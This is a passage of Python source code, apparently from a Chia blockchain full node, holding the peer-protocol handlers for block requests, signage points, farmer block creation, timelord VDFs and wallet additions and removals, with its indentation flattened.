@reply_type([ProtocolMessageTypes.respond_block, ProtocolMessageTypes.reject_block])
async def request_block(self, request: full_node_protocol.RequestBlock) -> Optional[Message]:
if not self.full_node.blockchain.contains_height(request.height):
reject = RejectBlock(request.height)
msg = make_msg(ProtocolMessageTypes.reject_block, reject)
return msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
if not request.include_transaction_block and block.transactions_generator is not None:
block = dataclasses.replace(block, transactions_generator=None)
return make_msg(ProtocolMessageTypes.respond_block, full_node_protocol.RespondBlock(block))
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
@api_request
@reply_type([ProtocolMessageTypes.respond_blocks, ProtocolMessageTypes.reject_blocks])
async def request_blocks(self, request: full_node_protocol.RequestBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
reject = RejectBlocks(request.start_height, request.end_height)
msg: Message = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
for i in range(request.start_height, request.end_height + 1):
if not self.full_node.blockchain.contains_height(uint32(i)):
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
if not request.include_transaction_block:
blocks: List[FullBlock] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash_i)
if block is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block = dataclasses.replace(block, transactions_generator=None)
blocks.append(block)
msg = make_msg(
ProtocolMessageTypes.respond_blocks,
full_node_protocol.RespondBlocks(request.start_height, request.end_height, blocks),
)
else:
blocks_bytes: List[bytes] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block_bytes: Optional[bytes] = await self.full_node.block_store.get_full_block_bytes(header_hash_i)
if block_bytes is None:
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
blocks_bytes.append(block_bytes)
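            # Hand-assemble the RespondBlocks payload from the raw block bytes so each block is streamed without being deserialized and re-serialized.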
respond_blocks_manually_streamed: bytes = (
bytes(uint32(request.start_height))
+ bytes(uint32(request.end_height))
+ len(blocks_bytes).to_bytes(4, "big", signed=False)
)
for block_bytes in blocks_bytes:
respond_blocks_manually_streamed += block_bytes
msg = make_msg(ProtocolMessageTypes.respond_blocks, respond_blocks_manually_streamed)
return msg
@api_request
async def reject_block(self, request: full_node_protocol.RejectBlock):
self.log.debug(f"reject_block {request.height}")
@api_request
async def reject_blocks(self, request: full_node_protocol.RejectBlocks):
self.log.debug(f"reject_blocks {request.start_height} {request.end_height}")
@api_request
async def respond_blocks(self, request: full_node_protocol.RespondBlocks) -> None:
self.log.warning("Received unsolicited/late blocks")
return None
@api_request
@peer_required
async def respond_block(
self,
respond_block: full_node_protocol.RespondBlock,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
"""
Receive a full block from a peer full node (or ourselves).
"""
self.log.warning(f"Received unsolicited/late block from peer {peer.get_peer_logging()}")
return None
@api_request
async def new_unfinished_block(
self, new_unfinished_block: full_node_protocol.NewUnfinishedBlock
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
block_hash = new_unfinished_block.unfinished_reward_hash
if self.full_node.full_node_store.get_unfinished_block(block_hash) is not None:
return None
# This prevents us from downloading the same block from many peers
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
return None
msg = make_msg(
ProtocolMessageTypes.request_unfinished_block,
full_node_protocol.RequestUnfinishedBlock(block_hash),
)
self.full_node.full_node_store.requesting_unfinished_blocks.add(block_hash)
# However, we want to eventually download from other peers, if this peer does not respond
# Todo: keep track of who it was
async def eventually_clear():
await asyncio.sleep(5)
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
self.full_node.full_node_store.requesting_unfinished_blocks.remove(block_hash)
asyncio.create_task(eventually_clear())
return msg
@api_request
@reply_type([ProtocolMessageTypes.respond_unfinished_block])
async def request_unfinished_block(
self, request_unfinished_block: full_node_protocol.RequestUnfinishedBlock
) -> Optional[Message]:
unfinished_block: Optional[UnfinishedBlock] = self.full_node.full_node_store.get_unfinished_block(
request_unfinished_block.unfinished_reward_hash
)
if unfinished_block is not None:
msg = make_msg(
ProtocolMessageTypes.respond_unfinished_block,
full_node_protocol.RespondUnfinishedBlock(unfinished_block),
)
return msg
return None
@peer_required
@api_request
@bytes_required
async def respond_unfinished_block(
self,
respond_unfinished_block: full_node_protocol.RespondUnfinishedBlock,
peer: ws.WSChiaConnection,
respond_unfinished_block_bytes: bytes = b"",
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_unfinished_block(
respond_unfinished_block, peer, block_bytes=respond_unfinished_block_bytes
)
return None
@api_request
@peer_required
async def new_signage_point_or_end_of_sub_slot(
self, new_sp: full_node_protocol.NewSignagePointOrEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_signage_point_by_index(
new_sp.challenge_hash,
new_sp.index_from_challenge,
new_sp.last_rc_infusion,
)
is not None
):
return None
if self.full_node.full_node_store.have_newer_signage_point(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
):
return None
if new_sp.index_from_challenge == 0 and new_sp.prev_challenge_hash is not None:
if self.full_node.full_node_store.get_sub_slot(new_sp.prev_challenge_hash) is None:
collected_eos = []
challenge_hash_to_request = new_sp.challenge_hash
last_rc = new_sp.last_rc_infusion
num_non_empty_sub_slots_seen = 0
for _ in range(30):
if num_non_empty_sub_slots_seen >= 3:
self.log.debug("Diverged from peer. Don't have the same blocks")
return None
# If this is an end of sub slot, and we don't have the prev, request the prev instead
# We want to catch up to the latest slot so we can receive signage points
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
challenge_hash_to_request, uint8(0), last_rc
)
response = await peer.request_signage_point_or_end_of_sub_slot(full_node_request, timeout=10)
if not isinstance(response, full_node_protocol.RespondEndOfSubSlot):
self.full_node.log.debug(f"Invalid response for slot {response}")
return None
collected_eos.append(response)
if (
self.full_node.full_node_store.get_sub_slot(
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
is not None
or response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
== self.full_node.constants.GENESIS_CHALLENGE
):
for eos in reversed(collected_eos):
await self.respond_end_of_sub_slot(eos, peer)
return None
if (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.number_of_iterations
!= response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.number_of_iterations
):
num_non_empty_sub_slots_seen += 1
challenge_hash_to_request = (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
last_rc = response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.challenge
self.full_node.log.warning("Failed to catch up in sub-slots")
return None
if new_sp.index_from_challenge > 0:
if (
new_sp.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE
and self.full_node.full_node_store.get_sub_slot(new_sp.challenge_hash) is None
):
                # If this is a normal signage point, and we don't have the end of sub slot, request the end of sub slot
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, uint8(0), new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
# Otherwise (we have the prev or the end of sub slot), request it normally
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
@api_request
@reply_type([ProtocolMessageTypes.respond_signage_point, ProtocolMessageTypes.respond_end_of_sub_slot])
async def request_signage_point_or_end_of_sub_slot(
self, request: full_node_protocol.RequestSignagePointOrEndOfSubSlot
) -> Optional[Message]:
if request.index_from_challenge == 0:
sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = self.full_node.full_node_store.get_sub_slot(
request.challenge_hash
)
if sub_slot is not None:
return make_msg(
ProtocolMessageTypes.respond_end_of_sub_slot,
full_node_protocol.RespondEndOfSubSlot(sub_slot[0]),
)
else:
if self.full_node.full_node_store.get_sub_slot(request.challenge_hash) is None:
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
self.log.info(f"Don't have challenge hash {request.challenge_hash}")
sp: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point_by_index(
request.challenge_hash,
request.index_from_challenge,
request.last_rc_infusion,
)
if sp is not None:
assert (
sp.cc_vdf is not None
and sp.cc_proof is not None
and sp.rc_vdf is not None
and sp.rc_proof is not None
)
full_node_response = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
sp.cc_vdf,
sp.cc_proof,
sp.rc_vdf,
sp.rc_proof,
)
return make_msg(ProtocolMessageTypes.respond_signage_point, full_node_response)
else:
self.log.info(f"Don't have signage point {request}")
return None
@peer_required
@api_request
async def respond_signage_point(
self, request: full_node_protocol.RespondSignagePoint, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
# Already have signage point
if self.full_node.full_node_store.have_newer_signage_point(
request.challenge_chain_vdf.challenge,
request.index_from_challenge,
request.reward_chain_vdf.challenge,
):
return None
existing_sp = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_vdf.output.get_hash()
)
if existing_sp is not None and existing_sp.rc_vdf == request.reward_chain_vdf:
return None
peak = self.full_node.blockchain.get_peak()
if peak is not None and peak.height > self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
next_sub_slot_iters = self.full_node.blockchain.get_next_slot_iters(peak.header_hash, True)
sub_slots_for_peak = await self.full_node.blockchain.get_sp_and_ip_sub_slots(peak.header_hash)
assert sub_slots_for_peak is not None
ip_sub_slot: Optional[EndOfSubSlotBundle] = sub_slots_for_peak[1]
else:
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
next_sub_slot_iters = sub_slot_iters
ip_sub_slot = None
added = self.full_node.full_node_store.new_signage_point(
request.index_from_challenge,
self.full_node.blockchain,
self.full_node.blockchain.get_peak(),
next_sub_slot_iters,
SignagePoint(
request.challenge_chain_vdf,
request.challenge_chain_proof,
request.reward_chain_vdf,
request.reward_chain_proof,
),
)
if added:
await self.full_node.signage_point_post_processing(request, peer, ip_sub_slot)
else:
self.log.debug(
f"Signage point {request.index_from_challenge} not added, CC challenge: "
f"{request.challenge_chain_vdf.challenge}, RC challenge: {request.reward_chain_vdf.challenge}"
)
return None
@peer_required
@api_request
async def respond_end_of_sub_slot(
self, request: full_node_protocol.RespondEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
msg, _ = await self.full_node.respond_end_of_sub_slot(request, peer)
return msg
@peer_required
@api_request
async def request_mempool_transactions(
self,
request: full_node_protocol.RequestMempoolTransactions,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
received_filter = PyBIP158(bytearray(request.filter))
items: List[MempoolItem] = await self.full_node.mempool_manager.get_items_not_in_filter(received_filter)
for item in items:
transaction = full_node_protocol.RespondTransaction(item.spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
await peer.send_message(msg)
return None
# FARMER PROTOCOL
@api_request
@peer_required
async def declare_proof_of_space(
self, request: farmer_protocol.DeclareProofOfSpace, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
Creates a block body and header, with the proof of space, coinbase, and fee targets provided
by the farmer, and sends the hash of the header data back to the farmer.
"""
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
sp_vdfs: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_sp
)
if sp_vdfs is None:
self.log.warning(f"Received proof of space for an unknown signage point {request.challenge_chain_sp}")
return None
if request.signage_point_index > 0:
assert sp_vdfs.rc_vdf is not None
if sp_vdfs.rc_vdf.output.get_hash() != request.reward_chain_sp:
self.log.debug(
f"Received proof of space for a potentially old signage point {request.challenge_chain_sp}. "
f"Current sp: {sp_vdfs.rc_vdf.output.get_hash()}"
)
return None
if request.signage_point_index == 0:
cc_challenge_hash: bytes32 = request.challenge_chain_sp
else:
assert sp_vdfs.cc_vdf is not None
cc_challenge_hash = sp_vdfs.cc_vdf.challenge
pos_sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = None
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
# Checks that the proof of space is a response to a recent challenge and valid SP
pos_sub_slot = self.full_node.full_node_store.get_sub_slot(cc_challenge_hash)
if pos_sub_slot is None:
self.log.warning(f"Received proof of space for an unknown sub slot: {request}")
return None
total_iters_pos_slot: uint128 = pos_sub_slot[2]
else:
total_iters_pos_slot = uint128(0)
assert cc_challenge_hash == request.challenge_hash
# Now we know that the proof of space has a signage point either:
# 1. In the previous sub-slot of the peak (overflow)
# 2. In the same sub-slot as the peak
# 3. In a future sub-slot that we already know of
# Checks that the proof of space is valid
quality_string: Optional[bytes32] = request.proof_of_space.verify_and_get_quality_string(
self.full_node.constants, cc_challenge_hash, request.challenge_chain_sp
)
assert quality_string is not None and len(quality_string) == 32
# Grab best transactions from Mempool for given tip target
aggregate_signature: G2Element = G2Element()
block_generator: Optional[BlockGenerator] = None
additions: Optional[List[Coin]] = []
removals: Optional[List[Coin]] = []
async with self.full_node._blockchain_lock_high_priority:
peak: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
if peak is not None:
# Finds the last transaction block before this one
curr_l_tb: BlockRecord = peak
while not curr_l_tb.is_transaction_block:
curr_l_tb = self.full_node.blockchain.block_record(curr_l_tb.prev_hash)
try:
mempool_bundle = await self.full_node.mempool_manager.create_bundle_from_mempool(
curr_l_tb.header_hash
)
except Exception as e:
self.log.error(f"Traceback: {traceback.format_exc()}")
self.full_node.log.error(f"Error making spend bundle {e} peak: {peak}")
mempool_bundle = None
if mempool_bundle is not None:
spend_bundle = mempool_bundle[0]
additions = mempool_bundle[1]
removals = mempool_bundle[2]
self.full_node.log.info(f"Add rem: {len(additions)} {len(removals)}")
aggregate_signature = spend_bundle.aggregated_signature
if self.full_node.full_node_store.previous_generator is not None:
self.log.info(
f"Using previous generator for height "
f"{self.full_node.full_node_store.previous_generator}"
)
block_generator = best_solution_generator_from_template(
self.full_node.full_node_store.previous_generator, spend_bundle
)
else:
block_generator = simple_solution_generator(spend_bundle)
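            # These callbacks hand create_unfinished_block the farmer-provided signatures; the full node itself holds no plot or pool keys.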
def get_plot_sig(to_sign, _) -> G2Element:
if to_sign == request.challenge_chain_sp:
return request.challenge_chain_sp_signature
elif to_sign == request.reward_chain_sp:
return request.reward_chain_sp_signature
return G2Element()
def get_pool_sig(_1, _2) -> Optional[G2Element]:
return request.pool_signature
prev_b: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
# Finds the previous block from the signage point, ensuring that the reward chain VDF is correct
if prev_b is not None:
if request.signage_point_index == 0:
if pos_sub_slot is None:
self.log.warning("Pos sub slot is None")
return None
rc_challenge = pos_sub_slot[0].reward_chain.end_of_slot_vdf.challenge
else:
assert sp_vdfs.rc_vdf is not None
rc_challenge = sp_vdfs.rc_vdf.challenge
# Backtrack through empty sub-slots
for eos, _, _ in reversed(self.full_node.full_node_store.finished_sub_slots):
if eos is not None and eos.reward_chain.get_hash() == rc_challenge:
rc_challenge = eos.reward_chain.end_of_slot_vdf.challenge
found = False
attempts = 0
while prev_b is not None and attempts < 10:
if prev_b.reward_infusion_new_challenge == rc_challenge:
found = True
break
if prev_b.finished_reward_slot_hashes is not None and len(prev_b.finished_reward_slot_hashes) > 0:
if prev_b.finished_reward_slot_hashes[-1] == rc_challenge:
# This block includes a sub-slot which is where our SP vdf starts. Go back one more
# to find the prev block
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
found = True
break
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
attempts += 1
if not found:
self.log.warning("Did not find a previous block with the correct reward chain hash")
return None
try:
finished_sub_slots: Optional[
List[EndOfSubSlotBundle]
] = self.full_node.full_node_store.get_finished_sub_slots(
self.full_node.blockchain, prev_b, cc_challenge_hash
)
if finished_sub_slots is None:
return None
if (
len(finished_sub_slots) > 0
and pos_sub_slot is not None
and finished_sub_slots[-1] != pos_sub_slot[0]
):
self.log.error("Have different sub-slots than is required to farm this block")
return None
except ValueError as e:
self.log.warning(f"Value Error: {e}")
return None
if prev_b is None:
pool_target = PoolTarget(
self.full_node.constants.GENESIS_PRE_FARM_POOL_PUZZLE_HASH,
uint32(0),
)
farmer_ph = self.full_node.constants.GENESIS_PRE_FARM_FARMER_PUZZLE_HASH
else:
farmer_ph = request.farmer_puzzle_hash
if request.proof_of_space.pool_contract_puzzle_hash is not None:
pool_target = PoolTarget(request.proof_of_space.pool_contract_puzzle_hash, uint32(0))
else:
assert request.pool_target is not None
pool_target = request.pool_target
if peak is None or peak.height <= self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
difficulty = self.full_node.constants.DIFFICULTY_STARTING
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
else:
difficulty = uint64(peak.weight - self.full_node.blockchain.block_record(peak.prev_hash).weight)
sub_slot_iters = peak.sub_slot_iters
for sub_slot in finished_sub_slots:
if sub_slot.challenge_chain.new_difficulty is not None:
difficulty = sub_slot.challenge_chain.new_difficulty
if sub_slot.challenge_chain.new_sub_slot_iters is not None:
sub_slot_iters = sub_slot.challenge_chain.new_sub_slot_iters
required_iters: uint64 = calculate_iterations_quality(
self.full_node.constants.DIFFICULTY_CONSTANT_FACTOR,
quality_string,
request.proof_of_space.size,
difficulty,
request.challenge_chain_sp,
)
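            # Translate the proof quality into VDF iteration counts: sp_iters locates the signage point and ip_iters the infusion point within the current sub-slot.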
sp_iters: uint64 = calculate_sp_iters(self.full_node.constants, sub_slot_iters, request.signage_point_index)
ip_iters: uint64 = calculate_ip_iters(
self.full_node.constants,
sub_slot_iters,
request.signage_point_index,
required_iters,
)
# The block's timestamp must be greater than the previous transaction block's timestamp
timestamp = uint64(int(time.time()))
curr: Optional[BlockRecord] = prev_b
while curr is not None and not curr.is_transaction_block and curr.height != 0:
curr = self.full_node.blockchain.try_block_record(curr.prev_hash)
if curr is not None:
assert curr.timestamp is not None
if timestamp <= curr.timestamp:
timestamp = uint64(int(curr.timestamp + 1))
self.log.info("Starting to make the unfinished block")
unfinished_block: UnfinishedBlock = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
block_generator,
aggregate_signature,
additions,
removals,
prev_b,
finished_sub_slots,
)
self.log.info("Made the unfinished block")
if prev_b is not None:
height: uint32 = uint32(prev_b.height + 1)
else:
height = uint32(0)
self.full_node.full_node_store.add_candidate_block(quality_string, height, unfinished_block)
foliage_sb_data_hash = unfinished_block.foliage.foliage_block_data.get_hash()
if unfinished_block.is_transaction_block():
foliage_transaction_block_hash = unfinished_block.foliage.foliage_transaction_block_hash
else:
foliage_transaction_block_hash = bytes32([0] * 32)
assert foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
quality_string,
foliage_sb_data_hash,
foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
# Adds backup in case the first one fails
if unfinished_block.is_transaction_block() and unfinished_block.transactions_generator is not None:
unfinished_block_backup = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
None,
G2Element(),
None,
None,
prev_b,
finished_sub_slots,
)
self.full_node.full_node_store.add_candidate_block(
quality_string, height, unfinished_block_backup, backup=True
)
return None
@api_request
@peer_required
async def signed_values(
self, farmer_request: farmer_protocol.SignedValues, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
Signature of header hash, by the harvester. This is enough to create an unfinished
block, which only needs a Proof of Time to be finished. If the signature is valid,
we call the unfinished_block routine.
"""
candidate_tuple: Optional[Tuple[uint32, UnfinishedBlock]] = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string
)
if candidate_tuple is None:
self.log.warning(f"Quality string {farmer_request.quality_string} not found in database")
return None
height, candidate = candidate_tuple
if not AugSchemeMPL.verify(
candidate.reward_chain_block.proof_of_space.plot_public_key,
candidate.foliage.foliage_block_data.get_hash(),
farmer_request.foliage_block_data_signature,
):
self.log.warning("Signature not valid. There might be a collision in plots. Ignore this during tests.")
return None
fsb2 = dataclasses.replace(
candidate.foliage,
foliage_block_data_signature=farmer_request.foliage_block_data_signature,
)
if candidate.is_transaction_block():
fsb2 = dataclasses.replace(
fsb2, foliage_transaction_block_signature=farmer_request.foliage_transaction_block_signature
)
new_candidate = dataclasses.replace(candidate, foliage=fsb2)
if not self.full_node.has_valid_pool_sig(new_candidate):
self.log.warning("Trying to make a pre-farm block but height is not 0")
return None
# Propagate to ourselves (which validates and does further propagations)
request = full_node_protocol.RespondUnfinishedBlock(new_candidate)
try:
await self.full_node.respond_unfinished_block(request, None, True)
except Exception as e:
# If we have an error with this block, try making an empty block
self.full_node.log.error(f"Error farming block {e} {request}")
candidate_tuple = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string, backup=True
)
if candidate_tuple is not None:
height, unfinished_block = candidate_tuple
self.full_node.full_node_store.add_candidate_block(
farmer_request.quality_string, height, unfinished_block, False
)
# All unfinished blocks that we create will have the foliage transaction block and hash
assert unfinished_block.foliage.foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
farmer_request.quality_string,
unfinished_block.foliage.foliage_block_data.get_hash(),
unfinished_block.foliage.foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
return None
# TIMELORD PROTOCOL
@peer_required
@api_request
async def new_infusion_point_vdf(
self, request: timelord_protocol.NewInfusionPointVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
# Lookup unfinished blocks
async with self.full_node.timelord_lock:
return await self.full_node.new_infusion_point_vdf(request, peer)
@peer_required
@api_request
async def new_signage_point_vdf(
self, request: timelord_protocol.NewSignagePointVDF, peer: ws.WSChiaConnection
) -> None:
if self.full_node.sync_store.get_sync_mode():
return None
full_node_message = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
request.challenge_chain_sp_vdf,
request.challenge_chain_sp_proof,
request.reward_chain_sp_vdf,
request.reward_chain_sp_proof,
)
await self.respond_signage_point(full_node_message, peer)
@peer_required
@api_request
async def new_end_of_sub_slot_vdf(
self, request: timelord_protocol.NewEndOfSubSlotVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_sub_slot(request.end_of_sub_slot_bundle.challenge_chain.get_hash())
is not None
):
return None
# Calls our own internal message to handle the end of sub slot, and potentially broadcasts to other peers.
full_node_message = full_node_protocol.RespondEndOfSubSlot(request.end_of_sub_slot_bundle)
msg, added = await self.full_node.respond_end_of_sub_slot(full_node_message, peer)
if not added:
self.log.error(
f"Was not able to add end of sub-slot: "
f"{request.end_of_sub_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge}. "
f"Re-sending new-peak to timelord"
)
await self.full_node.send_peak_to_timelords(peer=peer)
return None
else:
return msg
@api_request
async def request_block_header(self, request: wallet_protocol.RequestBlockHeader) -> Optional[Message]:
header_hash = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
msg = make_msg(ProtocolMessageTypes.reject_header_request, RejectHeaderRequest(request.height))
return msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
tx_removals, tx_additions, _ = await self.full_node.blockchain.get_tx_removals_and_additions(block)
header_block = get_block_header(block, tx_additions, tx_removals)
msg = make_msg(
ProtocolMessageTypes.respond_block_header,
wallet_protocol.RespondBlockHeader(header_block),
)
return msg
return None
@api_request
async def request_additions(self, request: wallet_protocol.RequestAdditions) -> Optional[Message]:
if request.header_hash is None:
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
else:
header_hash = request.header_hash
if header_hash is None:
raise ValueError(f"Block at height {request.height} not found")
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
# We lock so that the coin store does not get modified
if (
block is None
or block.is_transaction_block() is False
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectAdditionsRequest(request.height, header_hash)
msg = make_msg(ProtocolMessageTypes.reject_additions_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
additions = await self.full_node.coin_store.get_coins_added_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
puzzlehash_coins_map: Dict[bytes32, List[Coin]] = {}
for coin_record in additions:
if coin_record.coin.puzzle_hash in puzzlehash_coins_map:
puzzlehash_coins_map[coin_record.coin.puzzle_hash].append(coin_record.coin)
else:
puzzlehash_coins_map[coin_record.coin.puzzle_hash] = [coin_record.coin]
coins_map: List[Tuple[bytes32, List[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes, Optional[bytes]]] = []
if request.puzzle_hashes is None:
for puzzle_hash, coins in puzzlehash_coins_map.items():
coins_map.append((puzzle_hash, coins))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, None)
else:
# Create addition Merkle set
addition_merkle_set = MerkleSet()
# Addition Merkle set contains puzzlehash and hash of all coins with that puzzlehash
for puzzle, coins in puzzlehash_coins_map.items():
addition_merkle_set.add_already_hashed(puzzle)
addition_merkle_set.add_already_hashed(hash_coin_list(coins))
assert addition_merkle_set.get_root() == block.foliage_transaction_block.additions_root
for puzzle_hash in request.puzzle_hashes:
result, proof = addition_merkle_set.is_included_already_hashed(puzzle_hash)
if puzzle_hash in puzzlehash_coins_map:
coins_map.append((puzzle_hash, puzzlehash_coins_map[puzzle_hash]))
hash_coin_str = hash_coin_list(puzzlehash_coins_map[puzzle_hash])
result_2, proof_2 = addition_merkle_set.is_included_already_hashed(hash_coin_str)
assert result
assert result_2
proofs_map.append((puzzle_hash, proof, proof_2))
else:
coins_map.append((puzzle_hash, []))
assert not result
proofs_map.append((puzzle_hash, proof, None))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_additions, response)
return msg
@api_request
async def request_removals(self, request: wallet_protocol.RequestRemovals) -> Optional[Message]:
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(request.header_hash)
# We lock so that the coin store does not get modified
peak_height = self.full_node.blockchain.get_peak_height()
if (
block is None
or block.is_transaction_block() is False
or block.height != request.height
or (peak_height is not None and block.height > peak_height)
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectRemovalsRequest(request.height, request.header_hash)
msg = make_msg(ProtocolMessageTypes.reject_removals_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
all_removals: List[CoinRecord] = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
all_removals_dict: Dict[bytes32, Coin] = {}
for coin_record in all_removals:
all_removals_dict[coin_record.coin.name()] = coin_record.coin
coins_map: List[Tuple[bytes32, Optional[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes]] = []
# If there are no transactions, respond with empty lists
if block.transactions_generator is None:
proofs: Optional[List]
if request.coin_names is None:
proofs = None
else:
proofs = []
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, [], proofs)
elif request.coin_names is None or len(request.coin_names) == 0:
for removed_name, removed_coin in all_removals_dict.items():
coins_map.append((removed_name, removed_coin))
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, None)
else:
assert block.transactions_generator
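            # Rebuild the removals Merkle set so inclusion (or exclusion) proofs can be produced for each requested coin name.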
removal_merkle_set = MerkleSet()
for removed_name, removed_coin in all_removals_dict.items():
removal_merkle_set.add_already_hashed(removed_name)
assert removal_merkle_set.get_root() == block.foliage_transaction_block.removals_root
for coin_name in request.coin_names:
result, proof = removal_merkle_set.is_included_already_hashed(coin_name)
proofs_map.append((coin_name, proof))
if coin_name in all_removals_dict:
removed_coin = all_removals_dict[coin_name]
coins_map.append((coin_name, removed_coin))
assert result
else:
coins_map.append((coin_name, None))
assert not result
